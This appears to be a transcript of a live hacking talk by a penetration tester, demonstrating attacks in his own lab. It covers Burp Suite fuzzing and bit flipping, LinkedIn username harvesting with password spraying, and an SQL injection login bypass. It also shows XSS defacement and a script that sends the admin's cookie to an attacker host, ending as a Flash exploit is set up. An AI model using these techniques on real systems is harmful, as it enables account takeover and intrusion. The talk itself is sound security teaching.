Altså, noen som har en idé om hva det er? Noen som ser hva du tror det er? Det er en decoding. Og det mangler 2 likestegn på slutten. Ja, nettopp, så alle nikker liksom. B64, men B64-dekoderen ligger noe bak der, så da må vi finne ut av det som ligger bak der. Og så er det et par som sier, ja. Oh yes, I can definitely do it in English. No problem. The slides are in English. I normally type in English and I do stuff in English, so why not speak in English? No problem. But yeah, there's a challenge on the screen, so if anyone solves it, there's a message for you. You can have the rest of my Coke if you figure it out. I'm just kidding. But yeah, these challenges are pretty fun. Online, there's a bunch of challenges everywhere. Hacking challenges, like difficult programming challenges, easy programming challenges, all kinds of different challenges. So this is just one of them. But the reason we know it's base 64 is because we look at the character sets. We see that it's uppercase, lowercase, A to Z, more or less, and 0 to 9. And that makes up to 64 characters, possible characters. You also have the slashes and the pluses, which are, do we see any pluses or slashes? Nope. And normally we have 2 equal signs, or maybe 1 equal sign at the end of the string as well, but I removed those just because, why not?
They're always there. They're not just padding.
Yeah, no, they're padding, so you can actually have a string without them. All right. So once the stream is ready, we're ready.
Yes, here we go.
Okay, well, welcome. I'm Chris Dale, and I am here to do a little presentation on hands-on hacking. So it's going to be very little PowerPoint and a lot of hacking, okay? Things might break, who cares? Hopefully you don't, because I don't care if something breaks. If something really breaks in my labs, honestly, I'm genuinely interested in seeing what broke. So we might have to do some debugging, okay? But don't feel bad about me, because if something breaks, it's more like, hey, cool, something new, okay? I do penetration testing and incident response for Netsecurity. So I'm the lead of a team when we basically do this hacking part as our day job. And sometimes we also have to do the incident response part. So there was the recent WannaCry, which was terrible for the weekend because media fluffed it up to be something big. And it turned out on Monday it was not really a big deal at all for our Norwegian customers. Maybe some of the guys in the audience or girls in the audience had different experiences, but WannaCry kept us up during the weekend at least. But I do all kinds of hacking. I do all kinds of competitions online, offline, on events at conferences. And I've won a couple of prizes here and there, which is cool. Some of these prizes was from Washington, D.C., where I did this little tournament of champions for NetWars. And it was a really fun event where we had lots of beers, lots of pizza, and lots of things to hack. And you get these coins from the different events if you win those events. But that's basically just about me, very, very short. So let's go through the agenda for today. I was thinking that at least we'll cover some hacking techniques, how actually we do penetration testing, even when there are no obvious vulnerabilities. Like, how do we even start to know what to look for? We're going to look at some client-side attacks, mainly because they are very, very prominent today. We see a bunch of client-side attacks everywhere, and they're not getting patched in time. Server-side vulnerabilities, not so much anymore, but client-side attacks, they really proliferate a lot today. And then, if we have time, we'll look at some extras, some password cracking, database vulnerabilities, and yeah, we'll see what we have time for. The first thing I want to bring you guys into is the concept of fuzzing. Anyone done fuzzing before? Maybe against a binary file? Basically, the concept of fuzzing is you take some kind of program that expects data, and you just shove as much data you can into that program, and you record the responses. Just to see how something behaves under stress, under weird data types, under weird, like anything you can push to it, you record a response, and just see what happens. So I have a couple of demos I want to show you guys. Anyone seen this before, by the way? My presentation doing this lab. I know Martin and Ooh, name farts. Anyways, oh, I just had it. Lossa. So I know you guys have seen it, right? I do apologize. But, oh, we even have our friend up there. Not going to go with the names anymore. But let's do a demo. So basically, the whole presentation is going to be like this. It's going to be me going into PowerPoint, going through a couple of slides, and then we're back into our little lab environment. So this lab environment is running on a LAMP stack. So I just downloaded Linux out of Turnkey Linux. So it's a very, very small Linux Apache MySQL deployment. And on this box, I have these little scripts I want to show you guys. How would we solve these scripts? One of these scripts are, there is a page in true xxxdir.php where xxx is a number between 000 and 9999. So how would we go about breaking this type of thing? Like, how would we find this page? The reason I'm challenging us on this specific problem is because normally we don't have numbers within a string, like within a script, but we very often have these magic numbers represented in the URL bar. For example, up here, if I had, for example, like UID equals 5919, I want to try every single combination ranging from 1 to 9999 just to see if there's anything else I have access to. And UID might be the user ID. In this example, though, we have a page that is hidden, and it's somewhere inside in true, so it's going to be like any number within the URL 000 to 999. There's going to be a page in there somewhere. So I'm guessing at the Linux user group, most of you guys would just script this with wget or curl or something like that. It would be a very, very simple task to accomplish. Record your responses, see where you get a 404, and see where you get a 200 OK, and we're good. However, in the hacking world, it's much, much more simpler than that. We don't have to script a lot of things because we use intercepting proxies. So an intercepting proxy is a tool like this. I have my Firefox configured with Foxy Proxy, directing every single request my browser sends to the internet or wherever. Every single request is actually being proxied through my local host 127001 on port 8080. So instead of the request actually going to the internet, they're being sent to this local proxy. This proxy is Burp Suit, and it looks like this. So if I click intercept on, I refresh this page, I basically reload it. It has now captured my request. So this is basically everything my browser sends to the web server is enclosed in this request. There are no secrets behind the scenes there, okay? If there's any JavaScript doing any AJAX stuff, it's going to pass through my proxy. If there's any WebSockets taking place, it's going to pass through my proxy. So we don't have any lies. We don't have anything that we can't understand passing to the solution we're auditing. And so far, this is a very, very simple GET request. So there's no magic in here. But the cool part is that I can now take this GET request and send it to my tool called Intruder. The Intruder is basically my fuzzer. So this tool I'm using is called Burp Suit. It's freely available online. You can license it and get some extra features, but it's very, very much usable for free. But this Intruder is where it gets fun, because it allows me to specify these variables. So you see these little paragraph marks? That defines a variable that I can replace with new values. Values, for example, based out of a script, values based out of a payload type, or anything I can come up with.
Can I interrupt you a little bit?
Yes.
We need to look at this FSM page.
Oh, let's look at it.
So it's running fine.
So was I.
Sorry.
It's okay. Technical problems, we don't mind it. Should I just keep running?
Yeah.
Okay. So I've just defined my little variable within the three numbers. And just watch now how easy it is for me to take this variable, take these numbers, to become anything from 000 to 999. I just open payloads, I select, look, I want to iterate numbers from the value 000 to 999, step 1. Look, I want to jump one number at a time. Maximum and minimum integers, 3, no fractions, should be good. I'm going to press start attack. And at the bottom here, we can see how many requests my little intruder is sending. Just like that, I sent 1,000 requests to my web server very quickly, 1,000 requests. But the cool part is, this is where our scripting capabilities kind of normally fall short. I now have a table which I have recorded the different outputs from the different requests. So I can now very easily sort on status code in true, oh, actually, and if we have a bug, we can fix it very, very easily. So let's go back to position. I believe this U should be here, because I just sorted for status code, and we only saw 404s, so we didn't find anything special. Oh, it's a capital, and we're on Linux as well, so my caps lock was on. So let's do a lowercase u. On Windows, that would have worked, because Windows sucks. I was expecting it like, oh yeah! But just like that, we just sort by status code, and we can see that, yeah, we found something where the value was 419. But the cool part is, I can sort for different stuff here. I can sort for length. Like, hey, who has the number of bytes that I sent from the web server? Who has a different number of bytes? Something that is not ordinary. So immediately, this 419, it also sticks out from the rest, right? I could sort for response completed, like how many milliseconds does the different solutions, different scripts take to reply? And this script where we had a payload 419, it had like 4 times amount of time it took before this request completed. So this is where the flexibility comes in. And we can also add in our options. We can do like a grep search for a specific thing inside the responses, and we can flag those requests. We can even do a grep extract. So basically, we can do we can say anything within the following div in HTML will be extracted and will be put into our little table window here. So I will show that very shortly. So let's see what happens when we go into payload 19. We click the response. We click the render button. Scroll down. It doesn't look like there's a lot of data there, but let's see if we can open it up here. And there's the U again. And there we have something special, the power of automation. Secret stuff might be here. Failure to restrict URL access can be painful. And just in the past few weeks, I believe, yes, there has been, I'd like to call it a major shitstorm in the news, because several developers failed to restrict URL access to specific invoices and specific things that shouldn't be accessible by anyone online. But all of a sudden, the Bing, well, actually, Internet Explorer started to send these URLs to Bing, and Bing started crawling these hidden URLs, and it was suddenly indexed online. And that could be tremendously bad if we forget to add access control on these things. But let's just move on to our next example, because it gets more interesting. This is a very simple example. But what about this one? I've tried my best to code what could potentially be the start of some game, okay? So we have cache, we have 100 cache, we have this username, elite, and wouldn't it be nice to have more cache? Like, that's the normal thing. Maybe we wanted to change our user ID to 1, or maybe someone else's user ID. These are things that we immediately start to think about when we see something like this. But we have to look at the source code first of all. So if I press Control U, we can see this little hidden value up here. So this hidden data value is actually what builds up the data represented in the HTML. So I know this because I built a script, but if we didn't know this, we would have to try, right? So we would have to try to change this little URL, this little hidden field to something else and see how the web page responds to it. So ideally, I would put this up as a get parameter, and I'll have it up there. I believe it was called data. Yes, it was. And what does this string look like to anyone? We've already done this exercise once. Is this base64? No, like people immediately like, it's probably hex, right? So whenever we see something like that, it's probably hex, we start to decode it. So we take the data, I'll open up my Chrome, and I have this little tool called CyberChef. It's just a local HTML file with a bunch of JavaScript functions. And I'll do from hex. So this will basically decode the hex. And oh yeah, this is this Gammal Norsk or is it Russian? No, it's something weird, right? Whenever we see something weird, we could be thinking about it could be compression, it could be encryption, it could be a lot of things. But right now, as an attacker, we don't really know what this is. So do we stop there? No, we start to look at the string and try to change the strings and see if there's anything behind it changing. So let's take this string into our fusser and see if we can make it behave differently. So in my proxy, I'll just intercept the request to this script, press Ctrl-I, send it to the intruder up here, and immediately I'll remove the cookie, by the way, because I don't like web servers remembering who I am from request to request, so I'll just not send my cookie. So we have this data field right now. It's being marked as a variable. And in my payload list here, there's a bunch of different payloads I can select from. One of the more interesting when we're talking about potentially the encryption part is what we call block shuffling and bit flipping. Bit flipping is basically what it sounds like. We take every single byte, we split it into bits, and if the bit is a 0, we change it into a 1. For the entire string, we do this bit flipping up and down, up and up and down, and then we record the responses. So this was encoded as ASCII hex, or at least as hex. So let's just start the attack. We don't need to change anything. And there's a bunch of requests going on. It didn't say how many, but it just ran until it was out of bits to flip. So that's what we're doing. Oh, this is going to be fun with this little pop-up down there. So where do we go from here? We could sort by length again, right? But then again, there's so many variances. There's not a lot of things to go on when it comes to length. Status code is also no good. But remember, in our requests, in our responses, we had, let's go into, actually just state raw. We had this values, cache 100 in the username. Or yeah, user ID. So what we could do is that for every request, we'll record if these values ever change, and if they change into something interesting. And this is very, very easy with a fusser like this. I'll just add a little grep extract up here. And down here, simply, I'll just highlight the text. Oops. Like this. And if you look up here, it has now tried to determine where it should start the capture. So it just helps me a bit. You could also do it with a regex if you have complex queries or complex data types you need to extract. So if we now go back to our results, we suddenly have this little column over here, which we can sort by. And when you mess with encryption, this is very often what you get. You get garbage, right? But you could get lucky. So let's just look at this result. And down here, we see things starting to make sense again. We're now inside encrypted string, flipping bits that actually has a valid meaning for the strings. So we have this little exclamation mark up here. We could perhaps flip a bit that changes something. Like here we have cache 8,100, but there's no colon. So that data type would probably not parse very well for the server if we sent it back. But if we go down, let's see if we can find something that actually makes sense. Did I actually skip by it? Bunch of garbage. Who knows? I did port this to Linux, so it might be funny. We have, ooh, just 80 more. Shouldn't there be like, can we get more cache than 80 more cache? Did you guys see that? There was 80 more cache up here. Cache, 180. Oh, 900, yes, we're lucky. We got 900 cache. So what we would do with this is that we would take the request, the data that we've now changed, back into our application, replace it up here, and we can see that now we have 900 cache. And this is the server side doing the decryption of this string and sending me back the 900 cache. So who would ever implement something like this? Like, why would you be so stupid? Like, send someone an encrypted string and base something out of that. It sounds stupid, and it is stupid, don't get me wrong. But sometimes you will see developers are using this concept of sending encrypted strings to the clients because the client is then responsible of sending that encrypted string to a third party, for example, or being like a relay or a proxy of that data, owning that data for a short amount of time. So we actually do see this sometimes. And whenever we have weird values we don't understand, we try to fuss it and we try to bit flip it and block shuffle it to see if there's any erratic behaviors in the application. So just like that, we're rich, or at least a bit rich. Richer, 900. It could be GEMS, so diamonds. It could be very rich. So last example in this solution. So we have this welcome screen saying, hey, this is a welcome screen to the Access viewer. Make yourself at home. It's like a free invitation to hack it, right? Well, there is this little thing up here. It says A equals view access. Immediately, we might think, yeah, there might be like, what if there's like this edit access? Like edit access, could there be like, oh, I have a Lenovo PC and the trackpad is crap. Edit access, nope. Just immediate redirect back to view access. So would we go about guessing like there could be like delete access, there could be like grant access, there could be like access on, there could be so much stuff here, right? But it's hard to test this manually. So whenever we see a verb like view or change or add or remove, anything like that, we immediately send it to our fusser and we fuss the verbs. We fuss it with legit words. So just sending it to my intruder up here. And we have the view, let me remove that cookie. And we want to change, right? We don't want to change the whole thing. We want to keep the access part, but we don't want to change the view part of things. So let's look now at what happens if we can add some payloads. And where is my payloads? Oh, they're all the way in my repository. Fussing? Yes. So there's a set of common methods. This could be nice, like delete, remove, create, add, send, puts. This could be nice to have. Download, edit, change, alter, modify, all these different things. These are words that will now be replaced into the variable. I do believe I have another dictionary as well that I can use for this type of work. Debug parameters, yes. So enable, disable, all these things. And now let's just see what happens. So there's a bunch of redirects, right? The first one, which is my initial request with view access, just returns a 200 OK. This could be a prime example to sort by the status code. And whenever we have view access, it's 200 OK. But with grant access, it's also 200 OK. So just like that, we got something different. And who knows if we have access to it or not, but it could give us an idea of a place where we have potential vulnerabilities, potential security vulnerabilities. So yeah, only authorized personnel. We found this little thing just by fussing very, very quickly. Normally, though, this would be behind access control, right? But the moment you have another function to test, another function to probe for vulnerabilities, the attack surface increases, which is good for bad guys. But wait, there could be more. And I do this little exercise for every single customer. I do another fuzzing exercise on a certain script. I'll decide which script it is. Just any script that looks like this is like a good landing page, like a good landing page for an administrator, or a good place for someone to be. I'll add another parameter, and I'll add the parameter that says, hey, empty string, empty variable equals empty variable, and I'll set my attack to be a cluster bomb, and I'll use the same payloads, all the same variables like edits, add-in, grant, and so on, and I'll put those values against each other. So it will see, it will be, I'll show you guys, I'll add another list of payloads. Let's see. So for every word on payload set number 1, for every word in this list, like operations, for example, operations, for every word in this list, I will try every word in this list. So I'll try operations equals bypass, for example. Operations equals results, operations equals auth. And I'll just see if there's anything, because sometimes we do have developers building in backdoors. And notice the amount of requests, by the way, there's 10K requests. We might want to bump up the number of threads, 20 maybe. Yeah, should be quicker. So whenever you run 10,000 requests against a web server, right, it could be a good idea to sort our responses while it's running by the response completed. Because if you suddenly see these numbers, these are milliseconds. If you suddenly see these numbers rise to the thousands, you're running a denial of service on this web server. You're actually bringing so much bandwidth, you're hogging the script so much that you're actually causing it to crash. But with request 998, we have developer equals on had this little change, 63,000 bytes response. So let's see what happens if we go into our application and do developer equals on. And suddenly we have the PHP info. And this is useful information for developers and IT admins, right? So they might hide that, so there is a place no one will find it. And we can sometimes find these type of things in applications. If we can use it for something, well, maybe not, but still, it's an information disclosure. So that's like the first part of my little demos. Any questions on this, by the way? We're good? Cool. Fuzzing is nice. It's good with scripting, but it's really good when you use a fuzzer. Yes, Francisco. Nice to see you, man.
How do you deal with denial of service? Do you throw your fuzzer somehow?
One more time. How do you deal with what?
With preventing, denial of service, or if you get kicked out, you get kicked out or something, or...
Right. So well, first of all, I don't want to run enough threads to actually cause myself to be like causing a denial of service. But look, I'm running the attack over a course of 30 seconds, right? How much time does a bad guy have?
Well, my firewalls would have cut you off after about 10 attempts.
Right. So how much time, again, how much time does an attacker have?
Well, and then going at your speed would be inside of a couple seconds.
Right. But still, it's causing potentially a denial of service if you run hard, but you can limit your attack and run slow and steady over weeks, even months if you want. But if you have a very nasty firewall blocking you based off the amount of packets per second, for example, or based off the amount of requests per second, you don't want to probe for this stuff first, right? This comes later. I'll show you guys what you want to probe for. You want to probe to try gain access to an application. So I want to show you guys how advanced persistent threat actors work. APTs, nation states, how they're breaking in. Unless they have 0 days, they're not going to be terribly advanced, okay? So I'll show you guys what most attackers will do in order to gain themselves access to a platform. So I have this little product. It's called Elite Host. And this is where we want to get in, right? This is our business. This is our target. And right now, this is everything that the business is exposing. They're not exposing any other functionality anywhere. So this is all you got. This is all you got to work on. So immediately people will like start like, aha, it could be like an SQL injection. And we'll start and type in our SQL injection and see what happens. But it turns out that no, there are no vulnerabilities here because this solution has been pen tested a bunch of times. Or am I lying? Is there a vulnerability on my screen right now? Login failed. Check your login name. Yes.
It just says login name, not login name or password.
Yes.
You know that it's the login name that was the problem.
The error message is not ambiguous. This means that, look, this user does not exist in the database. So what if we found a user that is in a database, like admin? Well, no, there's no admin either. So what we could do, like, we need to figure out the naming scheme of the usernames taking place here, right? So we could go to LinkedIn and get a list of employees and try different variations of one username, of one name, and try to create like 25 usernames out of that name and see if any one of those sticks. I'll not do that. I'll not do that right now. I did increase the font size today. I wonder why it's not. Let's do a little bash from Windows, which is cool. And do a whois on the owner of this company, Netsecurity.no. And this company is registered, well, the domain name is registered by Jan up here. Potentially be that he has a weak password, right? But it's very unlikely that we're going to guess his password just out of the blue. It does happen, but it's unlikely. So what we want now is that we want to harvest as many users as possible just to try find that one dummy that has a bad password. And where do we start from this? Well, in my opinion, the most obvious part is LinkedIn. So I'll go to LinkedIn. I'll search up the company name. So it says Netsecurity somewhere I searched, I believe. And these are the employees of Netsecurity. Here you can see that me and Chris Dale, we share 932 connections for some reason. I believe that's a bug. So these are employee names, and these have email addresses for this company. So very likely, it looks like the naming scheme is the first name at netsecurity.no. So I'll just scrape all these names of LinkedIn. I'll just use a little JavaScript snippet I wrote. I will be copy-pasting somewhat because it sucks writing it manually. So I'll just paste this JavaScript in here, and I now have all the employee names, right? There's actually 3 pages, so I could make my JavaScript a bit more fancy, but it's just, actually, I had to rewrite my JavaScript just recently because LinkedIn changed their whole layout stuff. You guys remember that? I'm like, ugh. But we now suddenly have a very easy way to get a list of employees. So let me bring up, let's see, we're in Blake. We have a list of employees. These are all from LinkedIn. And I'll create usernames out of this, like this. Right? Makes sense? Actually, let's remove admin because we don't know about that one. And we now have the names from LinkedIn, more or less. We had some new employees coming into the company, so there's not all of them. So what we now could do, we could try log in with every single one of these and see if anyone has the, I'm sorry to say, stupid password like Brann 123 or Winter 2017 or Spring 18 or any one of these weak type of passwords. And this is also very, very easy with a fuzzing tool like this. So we'll just log on with admin, capture the request like this. Did not work because I refreshed admin. We need a post request like this. Send it to the intruder. Remove this cookie here. And then we add 2 variables. One for username, one for password. We tell the attack type to be cluster bomb. There are 4 different types of attacks here, but they're not like, you can click the help file here and read all about them. But cluster bomb and a sniper attack are the most common ones. And then we'll load up the usernames in our first variable. Like that. And then I have a list of potential passwords. So I mentioned some of those potential passwords to you, right? Like password 123, princess 123. That's been actually, I've seen that a couple of times. And there's some encoding errors, but who cares? We'll just try these few targeted passwords and see what happens. I also need to account for that this solution, when logging in, it wants to send me some cookies. So I'll not only process redirections, I'll also process cookies in this redirection. That's also a nice feature with a commercial fuzzer like this. It is free as well, but with the free version, they actually cap the number of requests you can make per minute. So they make it slow, which is not very good. So let's see what happens now. We just logged in, and with a bunch of different usernames. So these are the usernames we tried with the password Netsecurity to see if anyone is have these weak passwords. And keep in mind, this could again be run over several weeks if we wanted to. Sort by length. Greatest first. Let's see. And we do have two users that seemingly have a weak password. It's Lisbeth and Ton. For some reason, they have a very weak password. I don't know why I chose those two people because it's just random, to be honest. But summer 2016 and winter 2017 are potential logins. So let's try with Ton. Whoa. I did learn to type when I was very young, but sometimes you forget. Was it summer? Nice English. Norsk. Summer 2016. Nope. Let's see. Ton at netsecurity.no. Capital S. And there we go. And as an attacker, this means the attack surface, it used to be this small, right? And now suddenly the attack surface is, hey, contact support, change password, search for users, ping a server, all these nice usy things that are potentially more vulnerable than other things. Do you think that people are that much more diligent with their security on the inside of applications that they are on the outside of applications? It's a leading question. They're not. People are very, very cautious about having their external facing scripts pen-tested and robust, secure basically. But once you're logged in, famous quote, we trust our users. Which might or might not be a good idea. I don't think it's a good idea. So we find usernames because we want to find the potential that some user has an easy password. And most of the time they do. There's also the potential of these two users. Do you think any of those had access to VPN? If you do a port scan of this application now, this business, sorry, and if there's a VPN endpoint there, do you think they would have the same password there? Or could it perhaps be the password summer 2015 on that service maybe? So what happened if you found a user and you logged into their VPN? You're suddenly on their internal network, unless you have two-factor authentication or something like that. So it could be this easy, and it very often is. And now people are thinking, but I have CAPTCHA, I have rate limiting, and so on. But keep in mind, if you block someone by IP on failed logins, you're not going to have big customers. Because take, for example, Statoil or Aker Solutions. Every single client that is communicating to the internet is communicating from the same single source IP address. So if you decide to block people logging into your solution based off the source IP address, if they have more than 10 failed logins for a day, you're going to block their IP address. You're going to shut out your big customers. So one of my customers had Aker Solutions as their customers, and we had on average 250 failed logins a day. So you can't really block them on that. You could add CAPTCHA, but then again, yes, it can be broken. It's more or less, it could be robust, but it helps. You could do some profiling of the client to see if it's the same web browser, same user, and so on. But it's not very, very easy. Questions on this? The reason I'm asking for questions is because I know this room is filled with a lot of smart people, and I hope someone will like, hey, what about this? And I'm like, hey, yeah, that would be cool. But please do stop me if you do have questions. And we also sometimes see that it could be very, very easy as well. So let me show you guys a solution. I downloaded off Google. I Googled how to program PHP and MySQL to create a login form. I promise you, this is what I Googled, okay? I did this Google search, and I got a bunch of results, of course. And I took the first result from Google, clicked it, took all the source code, copied it onto my web server, and I checked it for vulnerabilities. And the reason I'm being prompted for a password now is because I don't want this readily open, available on the internet, because I would be owned very quickly. So let's look at my HDXS login here. So this is our little login, right? So this is straight out of Google. I have a user, Amalia. Amalia Scrum is the password, and it says, oh, hi, Amalia, this is the members area. This is the functionality of the script, right? So this is how you program a PHP MySQL form. It's all easy, all good. But it could be that it's vulnerable, and let's look at a vulnerability called SQL injection. Let's see what happens when we do this as our login name. Suddenly, it says, oh, hi, or 1 equals 1. Like, why would it do that? Some of you guys are thinking like, hey, this dude on the stage, he's tricking us. This solution accepts any password, any username, any password. Let's do like ASDF, blah. No. This worked because if we look at the query that they're doing, or most likely doing on a database, they have this select, right? Select like star from the users table, where username equals user and password equals pass. And let's pretend that the user variable and the pass variable is coming directly from the user, right? Because that's basically what it is. Around this user, we define it as a string, like this. When we enter our username to be, let's do a full copy, by the way. And I'm sure you guys can read this, so I'm going to lower the font a little bit. Actually, it's fine. So when we enter a username first, up here, we enter tick or 1 equals 1 semicolon hash. So this is our username. What just happened to the string? We took username and said, look, username equals empty. This is how the database would interpret it. So is the username empty, or is 1 equals 1? 1 equals 1 is what? True. It's an oxymoron. It's an always true statement. And then we have the little semicolon, which we could have probably left out of it, but semicolon basically terminates SQL, and the hash sign comments out the rest of the query. Said, hey, forget about the rest of all this complexity behind it. We don't care about it. So the password could be anything. But wait, if this is true, you see this little tick up here? This is the one the developer added. If this is true, we can log on with a different user as well. Let's see if we have a full understanding of this application. So what if we say, look, empty username or string1 equals string1, and then we let the application add the final tick for us. So no semicolon, no hash sign. Let's see what happens. It's the same result. Now suddenly inside the query, we don't have this, but we have tick there, and this is our payload. So now we basically abuse the fact that the developer is adding this little thing, tick, and we can use that to our advantage. That's also very cool. Today, people will have next generation firewalls, web application firewalls, that will detect this type of attack. And this is how naive the web application firewalls are. At least the next generation firewalls, every one I've tried so far. They'll actually have a signature for this. So if I do QWERTY, equals QWERTY, it goes straight through. It's very bad. But yeah, so that's an SQL injection for us. But we.
I've seen some advanced firewalls actually catch that one.
Oh.
But they won't catch it if you have different encodings.
Right, so you add encodings, multiple levels of decoding, you add UTF-8, blah, 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 yeah.
Start straight and more garbage instead.
So yeah, the web applications firewalls, they're good, but we can't rely upon them 100%. So we use them as an early warning system, basically. So it could be this easy, but very often it's not this easy for our customer systems. Like when we pen test customers, most of these low-hanging fruits like these are actually taken by someone else earlier. So we do see it a lot on internal intranets and stuff like that, though. So let's look at some final demos. We have a bunch of time left, so that's good. Let's look at cross-site scripting. Anyone here doesn't know what cross-site scripting is? Actually, that sucks. What a way to ask. Anyone know what cross-site scripting is? All right, so there's quite a few here that knows what cross-site scripting is. Cool. So we'll go the middle way then. With some people don't know, some people know. So let's look at the solution now. The one that we hacked ourselves into. So I can tickle servers here. I can ping them. I can contact support. I can search for users, change passwords, and we can go to the About Us page and it says, hey, are you worried about security in bold? You don't have to be, because in this business, we have everything in order. So the bad guy is normally, of course, then going to log himself out and go cry. Or not. Let's try the contact us support, the contact support. So the concept of cross-site scripting is as simple as this. We have a subject line, hello. And then I have a message to the support team, right? So I'll type in my little question. But I'm very mad today. So I'll say, hey, I want to capitalize some of my text within these little H1 tags. And I'll sign my guestbook. So it suddenly said, hey, my little question is very important to you. And this is the start of what we call cross-site scripting. Because now, what the user actually did, he sent a little small piece of HTML to the server, and the server reflects this value, this H1 value, the HTML, reflects it back into the application, and the HTML is now run within the context of my browser. So I sent it to myself. But this will also run in the administrator's browser when they go to read the support messages. So we can do something much more notorious than just change a little message with HTML. We can most likely add JavaScript here as well. So with JavaScript, what can we do with JavaScript? The correct question is, what can we not do with JavaScript? Because it is, in fact, Turing complete. And you can basically build JavaScript within JavaScript. You can do whatever you want with JavaScript. There's people who have built entire TCP engines within JavaScript. Dan Kaminsky, very impressive. So let's see. Let's see if we can find a way to deface this web page first, OK? It's not going to involve any JavaScript. So it'll just involve a little, hi, I am mad. It will involve a little iframe. And this iframe has a couple of attributes, which I'm not going to type for hand because, frankly, all the quotes, they suck. It's very hard to type them correctly. So here are my attributes. I'll go through them for you. By the way, when I paste now, notice that I couldn't paste the entire string. It is in my clipboard, but I could not paste the entire string. That is because there is a client-side limitation on this field, which is set to 50. And I should really patch this application because it's very annoying to remove. But know that when you have client-side controls, those client-side controls also need to be represented on the server side. If they don't, you can just bypass them, just like I did, remove them from the HTML. Anything you send to clients can be changed by the clients. Think about Silverlight. Think about Java, Flash. Anything you send to the client, Android APKs, anything can be changed. And then you have to have the server-side controls to validate what these clients are sending. So let's look at this little script up here. So we do have an iframe, and we point our iframe to this IP address of 5650 to a script called framebust. We then set the CSS styles to have no border. The position should be fixed in the upper left corner, and it should have 100% width and height. So what is actually behind this little server up here? 5650, that is actually my little Kali Linux server. And it says, this site has been pen tested. If you're seeing this message and you do not expect it, please contact me because I use this for my engagements. The reason I'm saying, look, if you see this message and I haven't already found it, that's because, look, if you see this message and I don't see it, it's because sometimes I put in a cross-site script, for example, like this one, and you'll have a logging solution. So you'll have like a Splunk or like an Elasticsearch or something like that that will take all the logs. And all of a sudden, my cross-site scripts are being run in places I cannot see. So I'll have like this little message here, so you can tell me if it's actually being run in different contexts. So let's see what happens if we sign our guestbook like this, and all of a sudden, it's a basically unusable application, right? So it's kind of hacked. There's been a lot of hacks that has been this way. It looks like the server is hacked, but it's really not. It's basically just HTML coming back from the server. So now you would have the server admin. He now need to, oh, there's a paraglider. Ooh. He now need to clean up. He'll log in. Actually, I can't remember the password for the admin user. Let's look like this one. Password is Charlie. And he'll need to reset the database. Create reset database. So the system operates again. Do you think anyone would ever be that stupid? It'll give the admin went in to read his little support messages now. And they see, look, oh no, they've been putting in HTML in our web forms. Do you think they would just reset the database and go on with business as usual? Hope not, but unfortunately, we saw this with a customer. They called me Sunday night. It was crisis. 2 years ago, they found a vulnerability in their web pages. One guy hacked one site with a cross-site scripting vulnerability, and all they did was remove it from the database. Then 2 years later, 2,000 sites is hacked. They're all defaced by a 14-year-old guy from Indonesia. Oops. And this is on a Sunday when every one of these web pages were running their ad campaigns on Facebook and stuff. There was a lot of money lost that night. So that's no good. But so defacement is annoying, right? There could be more insidious attacks. So let's look at two different types of attack. One attack, we do have till 8, right?
Yeah.
Yes.
We'll have to be out of here by 8.
All right, so 5 minutes to 8.
Yeah.
Good. So let's look at two more attacks. One where we try to hijack the session of the administrator. Look, the admin is logged in with Internet Explorer up here. So we want to take this session and see if we can log in with his session. We can do that with JavaScript, potentially. And we also want to look at, can I exploit his browser? Can I actually take over his Windows system? Like, can I actually control his mouse and see what is going on the desktop of the system using cross-site scripting? That is the challenge, okay? So we're going further with the cross-site scripting. So now I am mad, and I want to hack your session. Let's remove this little 50-character boundary. By the way, the cool part about a proxy is that within this proxy up here, I can go to options, and I can have down here, I can say, look, match and replace. Ooh. So I can say, hey, anything that matches user agent, anything, replace it and pretend to be an iPhone. Pretend to be, remove everything that has a maximum size of 50. Just replace it with nothing. So that's a good way to solve this little problem we have. But I'm not going to do that right now. I'm going to show you guys a session stealing attack. So we do have our cookie up here. So my new attack is like this. I'll zoom in. I'll need to add some script tags like this. Whoop. Trackpads, not good. Actually, I did bring a mouse, but this table is like not good. So what I'll do with my little JavaScript is, look, I will add a new picture to the web page, and I will look up the picture hosted at the attacker's site. That the picture is called collect.gif. And we add a parameter, which is called cookie equals, break out of the little image tag, and we append the document cookie. What is the document cookie? It is my cookie that is representing my login state. So let me take this cookie here. Let's go to the console. Let's do an alert. It's all the way in the bottom down there, folks. Alert, document cookie. And we can see that, look, this is my cookie representing my logged in state on this application. That is what is being appended to this fictitious image I am adding to the page. So let's go over to our Kali Linux. And let's do, there we go. Let's do tailf var log Apache access. Let's see what happens when we sign our guestbook referencing an image coming from this attacking machine. So, do we see any pictures? No, we don't, because Firefox doesn't render pictures that doesn't exist like that. It just shows us a little this black X, red X, sorry, in a square. But we could just set that to be removed with a style sheet. 0 pixels width, 0 pixels height. Go back into our access log, and we can now see that, look, yes, here is our cookie. Gufu, very nice name. It could be a nickname in Counter-Strike or something like this. But Gufu Mibu, there are 2 funny words in it. Gufu Mibu is my cookie, right? But I need to steal someone else's. So this is when the naive administrator comes in, and he'll, look, is there any support messages to me today? Ah, yes, I am mad, this asshole is back. But this time, his attack was unsuccessful. That's at least what the administrator will think, maybe. We'll go into our little web server on the attacking machine. We now see we have not Gufu, we have 1D2. We'll take this value. Trackpad is not big enough. Let's go. There we go. Right click, copy into the attacker's terminal. We'll click the home button. This is where it says greetings Tron, right? That's the user account we're in. Ooh, let's see, this is the cookie. We'll change the Gufu value with this one. Save, close. So I just edited my own cookie. I hit refresh, and it now says elite. So I've stolen this cookie. Should JavaScript ever access cookies? No, not really. Should should cookies ever be transmitted over HTTP? Not really, especially not if they're sensitive login cookies. So there's actually 2 flags that could have prevented this attack. One of those flags are for HTTP only. If this was set, if the developer set this cookie to be HTTP only, JavaScript would not be able to read this value and send it over HTTP wire like it did. So that is session stealing. But there is more. We can also use cross-site scripting to actually redirect users to exploit kits, where they actually try to exploit your browser, to take over your browser. So for this to work, I would actually have to have a vulnerable system that actually has a vulnerability that can be exploited, and also need some kind of attacking system that will send exploits. So for this, I have 2 systems. I have my Kali Linux over here. It has, I've already configured it with some options. It is now ready hosting an exploit. The exploit is called Adobe Flash Hacking Team Use After Free. This is an exploit that was released, or actually it was stolen about 2 years ago from an Italian company that is doing pen testing professionally. And they sell a lot of tools to government instances that are spying on people. And they had this little Flash 0-day vulnerability that a hacker stole from them and released to the world. So I'm going to use this flash exploit on a system up here, Windows 7, that is currently running an old version of Firefox and an old version of Adobe Flash. I need to be running an old version because they have already patched this vulnerability, right? So unless I patch, I would get owned. Nope. I'll just mute this phone, actually, will I? Like this. So the password is my password. And we have a browser, an OS, and some stuff. No, we don't need to restart. 